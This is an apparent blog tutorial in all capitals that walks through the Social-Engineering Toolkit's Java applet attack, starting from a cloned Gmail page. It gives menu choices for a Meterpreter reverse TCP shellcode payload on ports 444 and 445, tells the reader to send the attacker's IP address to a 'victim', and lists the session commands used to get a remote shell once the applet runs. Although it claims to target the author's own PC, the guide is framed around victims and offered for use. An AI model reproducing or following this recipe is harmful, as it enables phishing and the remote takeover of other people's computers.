IN THIS TUTORIAL I HAVE HACKED MY OWN WINDOWS 8 PC..
WORKING PLATFORM : WINDOWS, LINUX, MAC
PREREQUEST : INSTALLED JAVA ON VICTIMS PC.
OPEN SET TOOLKIT:
APPLICATION > KALI LINUX > EXPLOITATION TOOLS > SOCIAL ENGINEERING TOOLKIT > SE-TOOLKIT
AFTER OPEN SET U SEE THAT.
LET'S CHOOSE NO "1" => SOCIAL-ENGINEERING ATTACKS
LET'S CHOOSE NO 2 => WEBSITE ATTACK VECTORS
SELECT OPTION 1 => JAVA APPLET ATTACK METHOD
LET'S CHOOSE OPTION 2 => SITE CLONER
SET NAT/PORT FORWARDING TO => "NO"
ENTER UR "IP-ADDRESS" HERE TO REVERSE CONNECTION
ENTER THE SITE WHICH U WANNA CLONE
I AM USING GMAIL...
AFTER THAT THE TASK TO CHOOSE PAYLOAD JUST ENTER NO 16 => MULTIPYINJECTOR SHELLCODE INJECTION
CHOOSE 1 => WINDOW METERPRETER REVERSE TCP
CHOOSE PORT => 444 U CAN USE ANY PORT.
I AM CHOOSING TWO MORE PORTS SO THE SESSION OF HACKING IS BEING MORE POWERFUL..
I AM USING 444 AND 445 TWO MORE PORTS HERE.
NOW SELECT THE OPTION 6 => I'M FINISHED ADDING PAYLOAD.
YOU CAN SEE SOMETHING LIKE THIS.
IT STARTING THE PAYLOAD HANDLER AND WAITING FOR THE VICTIMS REPLY.
GIVE UR VICTIM UR IP ADDRESS MINE IS "192.168.152.132"
WHEN THE VICTIM PUT UR IP IN THEIR BROWSER HE/SHE GOT A JAVA POP UP.
WHEN HE/SHE RUN THIS APPLET THE MACHINE IS GONE HACKED.
NOW THE VICTIM HAS RUN UR APPLET IN HIS PC SO U GOT SOMETHING LIKE THIS.
AFTER THAT PUT A COMMAND IN THE SO YOU CAN GET THE SESSIONS U HAVE GOT FROM THE VICTIMS PC.
COMMAND : sessions -l
CHOOSE ANY SESSION OUT OF THERE USING THIS COMMAND = > sessions -i ID
TYPE = > shell
TO GET THE SYSTEM..
0 comments:
Post a Comment